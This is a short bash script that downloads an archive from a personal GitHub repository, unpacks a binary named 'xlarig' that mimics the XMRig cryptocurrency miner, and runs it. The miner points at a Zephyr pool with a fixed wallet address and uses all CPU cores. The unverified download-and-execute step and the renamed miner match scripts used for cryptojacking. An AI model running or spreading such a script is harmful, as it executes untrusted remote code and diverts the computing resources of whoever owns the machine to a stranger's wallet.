#!/bin/bash
wget https://github.com/bengetsia/soft/raw/main/xlarig.tar.gz && tar -xvf xlarig.tar.gz
./xlarig --donate-level 1 -o sg.zephyr.herominers.com:1123 -u ZEPHsB6FVC592wSbqrzZihFwcUYVZ6qMtPg3Jxpor71LCQDc8WMbK5165QZBked1e5JdPrqhMm2RZc54FTNZuoLeC58ctXxwk8k -p rin2 -a rx/0 -t $(nproc --all)
